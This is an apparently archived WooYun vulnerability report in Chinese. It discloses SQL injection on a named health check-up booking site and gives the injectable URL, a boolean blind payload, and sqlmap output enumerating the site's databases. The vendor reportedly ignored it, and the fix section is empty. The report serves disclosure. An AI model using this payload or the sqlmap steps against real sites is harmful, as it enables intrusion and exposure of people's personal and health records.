当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094505

漏洞标题:云健康服务平台存在SQL注入泄露数据库内大量人员信息泄漏

相关厂商:云健康

漏洞作者: 浮萍

提交时间:2015-01-29 10:33

修复时间:2015-03-15 10:34

公开时间:2015-03-15 10:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

云健康服务平台存在SQL注入泄露数据库内大量人员信息泄漏

详细说明:

http://wooyun.org/bugs/wooyun-2014-076218
http://tijian.jiankang.cn/
体检预约平台

Snap37.jpg


选择体检预约

Snap38.jpg


Snap39.jpg


输入’

Snap40.jpg


漏洞证明:

注入http://tijian.jiankang.cn/?mod=book&act=category&hid=2

sqlmap identified the following injection points with a total of 84 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://tijian.jiankang.cn:80/?mod=book&act=category&hid=2 AND 6221=6221
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


21个数据库

[*] 114_jiankang_cn
[*] bak_hzhailiao_com
[*] bak_hzhailiao_jiankang_cn
[*] bak_icare_jiankang_cn
[*] book_jiankang_cn
[*] bs_tjxt_scfb
[*] cn_jiankang
[*] equipments
[*] hzhailiao_com
[*] hzhailiao_jiankang_cn
[*] hzhailiao_jiankang_cn_bak
[*] hzlyy_com
[*] icare_jiankang_cn
[*] information_schema
[*] lyy_jiankang_cn
[*] mysql
[*] report_hzhailiao
[*] yls0804
[*] ylscn_jiankang


当前数据库[*] cn_jiankang

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝